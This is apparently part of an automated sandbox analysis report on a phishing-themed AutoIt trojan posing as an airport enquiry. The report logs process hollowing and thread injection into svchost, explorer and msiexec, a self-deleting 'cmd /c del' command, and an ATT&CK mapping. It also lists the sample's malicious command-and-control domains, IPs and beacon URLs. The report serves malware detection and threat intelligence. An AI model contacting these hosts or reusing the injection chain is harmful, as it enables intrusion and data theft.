          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030644B0 mov ecx, dword ptr fs:[00000030h]1_2_030644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BA4B0 mov eax, dword ptr fs:[00000030h]1_2_030BA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030304E5 mov ecx, dword ptr fs:[00000030h]1_2_030304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104B00 mov eax, dword ptr fs:[00000030h]1_2_03104B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CD81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
          Source: C:\Windows\SysWOW64\svchost.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CAA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CAA364 SetUnhandledExceptionFilter
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_00979C10 SetUnhandledExceptionFilter
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_009795F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe | Network Connect: 103.224.212.214 80
          Source: C:\Windows\explorer.exe | Network Connect: 76.223.105.230 80
          Source: C:\Windows\explorer.exe | Network Connect: 104.18.23.89 80
          Source: C:\Windows\explorer.exe | Network Connect: 103.235.46.96 80
          Source: C:\Windows\explorer.exe | Network Connect: 104.18.24.121 80
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Thread register set: target process: 2580
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread register set: target process: 2580
          Source: C:\Windows\SysWOW64\svchost.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\SysWOW64\svchost.exe | Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 970000
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CD8C93 LogonUserW
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00C83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00C84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CE4EC9 mouse_event
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe"
          Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CD81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CE4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe, explorer.exe, 00000002.00000002.4135304707.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133017076.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.1689640801.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4131348268.00000000018A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.1689421326.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4130664526.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1Progman$
          Source: explorer.exe, 00000002.00000000.1689640801.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4131348268.00000000018A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.1689640801.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4131348268.00000000018A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CA886B cpuid
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_00975C84 memset,GetACP,LoadLibraryW,GetProcAddress,GetLocaleInfoW,FreeLibrary,FormatMessageW,memset,GetVersionExW,lstrlenW,WriteFile,WriteFile
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CB50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CC2230 GetUserNameW
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CB418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00C84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

          Stealing of Sensitive Information

          Source: Yara match | File source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe | Binary or memory string: WIN_81
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe | Binary or memory string: WIN_XP
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe | Binary or memory string: WIN_XPe
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe | Binary or memory string: WIN_VISTA
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe | Binary or memory string: WIN_7
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe | Binary or memory string: WIN_8
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality

          Source: Yara match | File source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CF6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CF6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket
          MITRE ATT&CK Matrix (one line per tactic; cells are listed in the original row order, and a number preceding a technique is carried over as it appears in the original matrix):

          Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies | Network Topology
          Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless | Malvertising
          Initial Access: 2 Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise | Exploit Public-Facing Application
          Execution: 2 Native API | 1 Shared Modules | 2 Service Execution | Cron | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job | Command and Scripting Interpreter
          Persistence: 1 DLL Side-Loading | 2 Valid Accounts | 3 Windows Service | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job | At
          Privilege Escalation: 1 Exploitation for Privilege Escalation | 1 DLL Side-Loading | 2 Valid Accounts | 21 Access Token Manipulation | 3 Windows Service | 512 Process Injection | Startup Items | Scheduled Task/Job | At
          Defense Evasion: 1 Disable or Modify Tools | 1 Deobfuscate/Decode Files or Information | 2 Obfuscated Files or Information | 1 DLL Side-Loading | 1 Rootkit | 2 Valid Accounts | 2 Virtualization/Sandbox Evasion | 21 Access Token Manipulation | 512 Process Injection
          Credential Access: 1 Credential API Hooking | 21 Input Capture | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem | /etc/passwd and /etc/shadow
          Discovery: 2 System Time Discovery | 1 Account Discovery | 2 File and Directory Discovery | 225 System Information Discovery | 251 Security Software Discovery | 2 Virtualization/Sandbox Evasion | 3 Process Discovery | 11 Application Window Discovery | 1 System Owner/User Discovery
          Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services | Direct Cloud VM Connections
          Collection: 1 Archive Collected Data | 1 Credential API Hooking | 21 Input Capture | 3 Clipboard Data | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking | Data Staged
          Command and Control: 2 Ingress Tool Transfer | 1 Encrypted Channel | 2 Non-Application Layer Protocol | 12 Application Layer Protocol | Fallback Channels | Multiband Communication | Commonly Used Port | Application Layer Protocol | Web Protocols
          Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol | Exfiltration Over Symmetric Encrypted Non-C2 Protocol
          Impact: 1 System Shutdown/Reboot | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement | Internal Defacement
          Behavior Graph ID: 1499643 | Sample: New Al Maktoum Internationa... | Start date: 27/08/2024 | Architecture: WINDOWS | Score: 100

          Start node
            DNS/IP: www.iiixc759q.xyz; www.wvufcw948o.top; 13 other IPs or domains
            Signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 11 other signatures
            Signature on www.iiixc759q.xyz: Performs DNS queries to domains with low reputation
          -> New Al Maktoum International Airport Enquiry Ref #2401249.exe (started)
               Signatures: Binary is likely a compiled AutoIt script file; Maps a DLL or memory area into another process
             -> svchost.exe (started)
                  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 3 other signatures
                -> explorer.exe (injected)
                     DNS/IP: www.serverdayz.com 103.224.212.214, 49740, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia; sites.ludicrous.cloud 104.18.23.89, 49741, 80 CLOUDFLARENETUS United States; 3 other IPs or domains
                     Signature: System process connects to network (likely due to code injection or exploit)
                   -> msiexec.exe (started)
                        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
                      -> cmd.exe (started)
                         -> conhost.exe (started)

Source | Detection | Scanner | Label | Link
          New Al Maktoum International Airport Enquiry Ref #2401249.exe | 32% | ReversingLabs | Win32.Trojan.AutoitInject | -
          New Al Maktoum International Airport Enquiry Ref #2401249.exe | 29% | Virustotal | - | Browse
          New Al Maktoum International Airport Enquiry Ref #2401249.exe | 100% | Joe Sandbox ML | - | -
          No Antivirus matches
Source | Detection | Scanner | Label | Link
          www.arlatwestern.shop | 1% | Virustotal | - | Browse
          sites.ludicrous.cloud | 0% | Virustotal | - | Browse
          www.wshifen.com | 0% | Virustotal | - | Browse
          www.serverdayz.com | 1% | Virustotal | - | Browse
          wheresthechocolateat.com | 1% | Virustotal | - | Browse
          www.theselflovesite.com | 1% | Virustotal | - | Browse
          www.iiixc759q.xyz | 4% | Virustotal | - | Browse
          www.af28.top | 1% | Virustotal | - | Browse
          www.wheresthechocolateat.com | 1% | Virustotal | - | Browse
          www.betbox2341.com | 1% | Virustotal | - | Browse
          www.wvufcw948o.top | 1% | Virustotal | - | Browse
          www.sliveringaf.christmas | 3% | Virustotal | - | Browse
          www.strategiclogisticsagency.com | 0% | Virustotal | - | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.arlatwestern.shop | 104.18.24.121 | true | true | - | unknown
          sites.ludicrous.cloud | 104.18.23.89 | true | true | - | unknown
          www.wshifen.com | 103.235.46.96 | true | true | - | unknown
          www.serverdayz.com | 103.224.212.214 | true | true | - | unknown
          wheresthechocolateat.com | 76.223.105.230 | true | true | - | unknown
          www.theselflovesite.com | unknown | unknown | true | - | unknown
          www.af28.top | unknown | unknown | true | - | unknown
          www.strategiclogisticsagency.com | unknown | unknown | true | - | unknown
          www.iiixc759q.xyz | unknown | unknown | true | - | unknown
          www.wvufcw948o.top | unknown | unknown | true | - | unknown
          www.wheresthechocolateat.com | unknown | unknown | true | - | unknown
          www.betbox2341.com | unknown | unknown | true | - | unknown
          www.sliveringaf.christmas | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
          www.wheresthechocolateat.com/pt46/ | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
          http://www.wvufcw948o.top/pt46/?ara=runx2q514acjuuceA0OTyKdTIzcy0YcAOvUMICEfyLgC3vUfTcW2aWKxfLyo5+IB4FDn&D8V=_FNDAz | true | Avira URL Cloud: safe | unknown
          http://www.arlatwestern.shop/pt46/?ara=0RpqK4N+sKWumQPIkFOTbgKQJXSBpFKqwGjlCYY5Ihaqw+DawbshP/fsCF3RmMSwrLNm&D8V=_FNDAz | true | Avira URL Cloud: phishing | unknown
          http://www.wheresthechocolateat.com/pt46/?ara=QVbB1/DxL/c6NkCuk8rWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW++4CHG2+1qqv&D8V=_FNDAz | true | Avira URL Cloud: safe | unknown
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://api.msn.com/qexplorer.exe, 00000002.00000003.3106730980.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135304707.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.theselflovesite.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.arlatwestern.shop/pt46/www.betbox2341.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          http://www.per-watch.com/pt46/www.cb214.proexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.wvufcw948o.top/pt46/www.wheresthechocolateat.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.wvufcw948o.top/pt46/explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.cb214.pro/pt46/www.uddyen.shopexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.per-watch.com/pt46/explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.dreziuy.xyz/pt46/www.af28.topexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          unknown
          http://www.serverdayz.com/pt46/www.theselflovesite.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.wheresthechocolateat.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.iiixc759q.xyzReferer:explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.wvufcw948o.topReferer:explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.strategiclogisticsagency.com/pt46/explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.wheresthechocolateat.com/pt46/explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.strategiclogisticsagency.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.dreziuy.xyz/pt46/explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          unknown
          https://aka.ms/Vh5j3kexplorer.exe, 00000002.00000003.3106633874.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3460584807.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000002.00000002.4135304707.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106730980.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IP | Domain | Country | ASN | ASN Name | Malicious
          103.224.212.214 | www.serverdayz.com | Australia | 133618 | TRELLIAN-AS-AP Trellian Pty Limited AU | true
          76.223.105.230 | wheresthechocolateat.com | United States | 16509 | AMAZON-02 US | true
          104.18.23.89 | sites.ludicrous.cloud | United States | 13335 | CLOUDFLARENET US | true
          104.18.24.121 | www.arlatwestern.shop | United States | 13335 | CLOUDFLARENET US | true
          103.235.46.96 | www.wshifen.com | Hong Kong | 55967 | BAIDU Beijing Baidu Netcom Science and Technology Co Ltd | true
          Joe Sandbox version: 40.0.0 Tourmaline
          Analysis ID: 1499643
          Start date and time: 2024-08-27 10:50:08 +02:00
          Joe Sandbox product: CloudBasic
          Overall analysis duration: 0h 10m 1s
          Hypervisor based Inspection enabled: false
          Report type: full
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
